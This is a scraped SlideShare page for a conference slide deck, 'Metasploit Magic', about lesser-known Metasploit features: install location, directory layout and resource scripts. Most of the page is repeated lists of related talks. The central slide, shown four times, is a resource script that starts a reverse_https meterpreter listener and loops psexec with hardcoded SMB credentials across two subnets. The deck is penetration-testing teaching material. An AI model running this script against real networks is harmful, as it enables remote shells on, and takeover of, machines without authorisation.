SlideShare a Scribd company logo

Metasploit magic the dark coners of the framework

Rob Fuller
Rob Fuller
TechnologyEntertainment & Humor
1 of 19
Download to read offline
Metasploit Magic A little sleight of hand
But first...
Installing Metasploit svn co https://metasploit.com/svn/trunk msf
not.. here
ESPECIALLY not here
it is a SYN
SRSLY!
here is ok ;-)
and remember... this isn’t the only place you can install it...
Directory Structure HACKING msfd msfrpcd documentation msfmachscan psexec.rc msfconsole msfrpc armitage msfgui plugins data msfpescan scripts msfcli tools README msfencode bins modules msfpayload external msfelfscan msfupdate lib msfopcode
~/.msf3/ • history, logs, loot • msfconsole.rc • YOUR SETTINGS • modules • YOUR MODULES
resource files line by line script can understand ruby for meterpreter sessions now! ./msfconsole -r psexec.rc msf> resource psexec.rc
use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
magic • user .*psexec
other fun... • script • color = false • screen
meterpreter>guid • twitter.com/mubix • mubix[hak5.org]

Recommended

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at youRob Fuller
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 

Recommended

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at youRob Fuller
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
Bettercap
BettercapBettercap
BettercapRajivarnan (Rajiv)
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Combell NV
 
Final opensource record 2019
Final opensource record 2019Final opensource record 2019
Final opensource record 2019Karthik Sekhar
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
PM : code faster
PM : code fasterPM : code faster
PM : code fasterPHPPRO
 
RIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRob Fuller
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]RootedCON
 
Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Ilya Haykinson
 
C# to python
C# to pythonC# to python
C# to pythonTess Ferrandez
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershellMihir Shah
 
PuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, Puppet
PuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, PuppetPuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, Puppet
PuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, PuppetPuppet
 
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, PuppetPuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, PuppetPuppet
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOpsPichaya Morimoto
 
Pwnstaller
PwnstallerPwnstaller
PwnstallerWill Schroeder
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camPriyanka Aash
 
Pentesting with Metasploit
Pentesting with MetasploitPentesting with Metasploit
Pentesting with MetasploitPrakashchand Suthar
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 

More Related Content

What's hot

Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Combell NV
 
Final opensource record 2019
Final opensource record 2019Final opensource record 2019
Final opensource record 2019Karthik Sekhar
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
PM : code faster
PM : code fasterPM : code faster
PM : code fasterPHPPRO
 
RIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRob Fuller
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]RootedCON
 
Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Ilya Haykinson
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershellMihir Shah
 
PuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, Puppet
PuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, PuppetPuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, Puppet
PuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, PuppetPuppet
 
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, PuppetPuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, PuppetPuppet
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOpsPichaya Morimoto
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camPriyanka Aash
 

What's hot (20)

Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
 
Bettercap
BettercapBettercap
Bettercap
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy Style
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11
 
Final opensource record 2019
Final opensource record 2019Final opensource record 2019
Final opensource record 2019
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?
 
PM : code faster
PM : code fasterPM : code faster
PM : code faster
 
RIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRIT 2009 Intellectual Pwnership
RIT 2009 Intellectual Pwnership
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]
 
Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4
 
C# to python
C# to pythonC# to python
C# to python
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershell
 
PuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, Puppet
PuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, PuppetPuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, Puppet
PuppetConf 2016: Puppet 4.x: The Low WAT-tage Edition – Nick Fagerlund, Puppet
 
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, PuppetPuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOps
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
 

Viewers also liked

Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015Hykeos
 
From Couch To Career In 80 Hours
From Couch To Career In 80 HoursFrom Couch To Career In 80 Hours
From Couch To Career In 80 HoursRob Fuller
 
Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.jsWebsecurify
 
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injectionStHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injectionStHack
 
NoSQL, no SQL injections?
NoSQL, no SQL injections?NoSQL, no SQL injections?
NoSQL, no SQL injections?Wayne Huang
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?btpsec
 
Web Application Security 101 - 06 Authentication
Web Application Security 101 - 06 AuthenticationWeb Application Security 101 - 06 Authentication
Web Application Security 101 - 06 AuthenticationWebsecurify
 
NTXISSACSC2 - Advanced Persistent Threat (APT) Life Cycle Management Monty Mc...
NTXISSACSC2 - Advanced Persistent Threat (APT) Life Cycle Management Monty Mc...NTXISSACSC2 - Advanced Persistent Threat (APT) Life Cycle Management Monty Mc...
NTXISSACSC2 - Advanced Persistent Threat (APT) Life Cycle Management Monty Mc...North Texas Chapter of the ISSA
 
Oracle Database 12c Attack Vectors
Oracle Database 12c Attack VectorsOracle Database 12c Attack Vectors
Oracle Database 12c Attack VectorsMartin Toshev
 
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...44CON
 
NoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBNoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBSqreen
 
Ethical Hacking & Network Security
Ethical Hacking & Network Security Ethical Hacking & Network Security
Ethical Hacking & Network Security Lokender Yadav
 
APT 28 :Cyber Espionage and the Russian Government?
APT 28 :Cyber Espionage and the Russian Government?APT 28 :Cyber Espionage and the Russian Government?
APT 28 :Cyber Espionage and the Russian Government?anupriti
 

Viewers also liked (20)

Pentesting with Metasploit
Pentesting with MetasploitPentesting with Metasploit
Pentesting with Metasploit
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015Physical Penetration Testing - RootedCON 2015
Physical Penetration Testing - RootedCON 2015
 
GiTFO
GiTFOGiTFO
GiTFO
 
From Couch To Career In 80 Hours
From Couch To Career In 80 HoursFrom Couch To Career In 80 Hours
From Couch To Career In 80 Hours
 
hacking with node.JS
hacking with node.JShacking with node.JS
hacking with node.JS
 
Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.js
 
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injectionStHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
 
mimikatz @ asfws
mimikatz @ asfwsmimikatz @ asfws
mimikatz @ asfws
 
APT Webinar
APT WebinarAPT Webinar
APT Webinar
 
NoSQL, no SQL injections?
NoSQL, no SQL injections?NoSQL, no SQL injections?
NoSQL, no SQL injections?
 
Modelo apt 1
Modelo apt 1Modelo apt 1
Modelo apt 1
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?
 
Web Application Security 101 - 06 Authentication
Web Application Security 101 - 06 AuthenticationWeb Application Security 101 - 06 Authentication
Web Application Security 101 - 06 Authentication
 
NTXISSACSC2 - Advanced Persistent Threat (APT) Life Cycle Management Monty Mc...
NTXISSACSC2 - Advanced Persistent Threat (APT) Life Cycle Management Monty Mc...NTXISSACSC2 - Advanced Persistent Threat (APT) Life Cycle Management Monty Mc...
NTXISSACSC2 - Advanced Persistent Threat (APT) Life Cycle Management Monty Mc...
 
Oracle Database 12c Attack Vectors
Oracle Database 12c Attack VectorsOracle Database 12c Attack Vectors
Oracle Database 12c Attack Vectors
 
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Franci...
 
NoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBNoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDB
 
Ethical Hacking & Network Security
Ethical Hacking & Network Security Ethical Hacking & Network Security
Ethical Hacking & Network Security
 
APT 28 :Cyber Espionage and the Russian Government?
APT 28 :Cyber Espionage and the Russian Government?APT 28 :Cyber Espionage and the Russian Government?
APT 28 :Cyber Espionage and the Russian Government?
 

Similar to Metasploit magic the dark coners of the framework

Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesTrowalts
 
Puppet Camp Dallas 2014: Replacing Simple Puppet Modules with Providers
Puppet Camp Dallas 2014: Replacing Simple Puppet Modules with Providers Puppet Camp Dallas 2014: Replacing Simple Puppet Modules with Providers
Puppet Camp Dallas 2014: Replacing Simple Puppet Modules with Providers Puppet
 
Small, Simple, and Secure: Alpine Linux under the Microscope
Small, Simple, and Secure: Alpine Linux under the MicroscopeSmall, Simple, and Secure: Alpine Linux under the Microscope
Small, Simple, and Secure: Alpine Linux under the MicroscopeDocker, Inc.
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory AnalysisMoabi.com
 
MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)Masami Hiramatsu
 
Package Management via Spack on SJTU π Supercomputer
Package Management via Spack on SJTU π SupercomputerPackage Management via Spack on SJTU π Supercomputer
Package Management via Spack on SJTU π SupercomputerJianwen Wei
 
Puppet Camp NYC 2014: Build a Modern Infrastructure in 45 min!
Puppet Camp NYC 2014: Build a Modern Infrastructure in 45 min!Puppet Camp NYC 2014: Build a Modern Infrastructure in 45 min!
Puppet Camp NYC 2014: Build a Modern Infrastructure in 45 min!Puppet
 
Spl in the wild - zendcon2012
Spl in the wild - zendcon2012Spl in the wild - zendcon2012
Spl in the wild - zendcon2012Elizabeth Smith
 
Kickin' Ass with Cache-Fu (with notes)
Kickin' Ass with Cache-Fu (with notes)Kickin' Ass with Cache-Fu (with notes)
Kickin' Ass with Cache-Fu (with notes)err
 
Replacing Simple Puppet Modules with Providers
Replacing Simple Puppet Modules with ProvidersReplacing Simple Puppet Modules with Providers
Replacing Simple Puppet Modules with ProvidersPuppet
 
Drupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from SunDrupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from Sunsmattoon
 
Drupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, ScalingDrupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, Scalingsmattoon
 
Php and threads ZTS
Php and threads ZTSPhp and threads ZTS
Php and threads ZTSjulien pauli
 
Spark on Mesos-A Deep Dive-(Dean Wampler and Tim Chen, Typesafe and Mesosphere)
Spark on Mesos-A Deep Dive-(Dean Wampler and Tim Chen, Typesafe and Mesosphere)Spark on Mesos-A Deep Dive-(Dean Wampler and Tim Chen, Typesafe and Mesosphere)
Spark on Mesos-A Deep Dive-(Dean Wampler and Tim Chen, Typesafe and Mesosphere)Spark Summit
 
Your Inner Sysadmin - LonestarPHP 2015
Your Inner Sysadmin - LonestarPHP 2015Your Inner Sysadmin - LonestarPHP 2015
Your Inner Sysadmin - LonestarPHP 2015Chris Tankersley
 
Getting Started Running Apache Spark on Apache Mesos
Getting Started Running Apache Spark on Apache MesosGetting Started Running Apache Spark on Apache Mesos
Getting Started Running Apache Spark on Apache MesosPaco Nathan
 

Similar to Metasploit magic the dark coners of the framework (20)

Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Metasploit Basics
Metasploit BasicsMetasploit Basics
Metasploit Basics
 
Puppet Camp Dallas 2014: Replacing Simple Puppet Modules with Providers
Puppet Camp Dallas 2014: Replacing Simple Puppet Modules with Providers Puppet Camp Dallas 2014: Replacing Simple Puppet Modules with Providers
Puppet Camp Dallas 2014: Replacing Simple Puppet Modules with Providers
 
Small, Simple, and Secure: Alpine Linux under the Microscope
Small, Simple, and Secure: Alpine Linux under the MicroscopeSmall, Simple, and Secure: Alpine Linux under the Microscope
Small, Simple, and Secure: Alpine Linux under the Microscope
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
 
MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)
 
Package Management via Spack on SJTU π Supercomputer
Package Management via Spack on SJTU π SupercomputerPackage Management via Spack on SJTU π Supercomputer
Package Management via Spack on SJTU π Supercomputer
 
Back to the CORE
Back to the COREBack to the CORE
Back to the CORE
 
Puppet Camp NYC 2014: Build a Modern Infrastructure in 45 min!
Puppet Camp NYC 2014: Build a Modern Infrastructure in 45 min!Puppet Camp NYC 2014: Build a Modern Infrastructure in 45 min!
Puppet Camp NYC 2014: Build a Modern Infrastructure in 45 min!
 
Spl in the wild - zendcon2012
Spl in the wild - zendcon2012Spl in the wild - zendcon2012
Spl in the wild - zendcon2012
 
Kickin' Ass with Cache-Fu (with notes)
Kickin' Ass with Cache-Fu (with notes)Kickin' Ass with Cache-Fu (with notes)
Kickin' Ass with Cache-Fu (with notes)
 
Replacing Simple Puppet Modules with Providers
Replacing Simple Puppet Modules with ProvidersReplacing Simple Puppet Modules with Providers
Replacing Simple Puppet Modules with Providers
 
Drupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from SunDrupal Efficiency using open source technologies from Sun
Drupal Efficiency using open source technologies from Sun
 
Drupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, ScalingDrupal Efficiency - Coding, Deployment, Scaling
Drupal Efficiency - Coding, Deployment, Scaling
 
Php and threads ZTS
Php and threads ZTSPhp and threads ZTS
Php and threads ZTS
 
Spark on Mesos-A Deep Dive-(Dean Wampler and Tim Chen, Typesafe and Mesosphere)
Spark on Mesos-A Deep Dive-(Dean Wampler and Tim Chen, Typesafe and Mesosphere)Spark on Mesos-A Deep Dive-(Dean Wampler and Tim Chen, Typesafe and Mesosphere)
Spark on Mesos-A Deep Dive-(Dean Wampler and Tim Chen, Typesafe and Mesosphere)
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with Droids
 
Lec7
Lec7Lec7
Lec7
 
Your Inner Sysadmin - LonestarPHP 2015
Your Inner Sysadmin - LonestarPHP 2015Your Inner Sysadmin - LonestarPHP 2015
Your Inner Sysadmin - LonestarPHP 2015
 
Getting Started Running Apache Spark on Apache Mesos
Getting Started Running Apache Spark on Apache MesosGetting Started Running Apache Spark on Apache Mesos
Getting Started Running Apache Spark on Apache Mesos
 

More from Rob Fuller

KiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsKiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsRob Fuller
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
As The Phish Turns
As The Phish TurnsAs The Phish Turns
As The Phish TurnsRob Fuller
 
Intro to White Chapel
Intro to White ChapelIntro to White Chapel
Intro to White ChapelRob Fuller
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSRob Fuller
 
Memory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxMemory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxRob Fuller
 

More from Rob Fuller (6)

KiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsKiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's Assets
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for Pentesters
 
As The Phish Turns
As The Phish TurnsAs The Phish Turns
As The Phish Turns
 
Intro to White Chapel
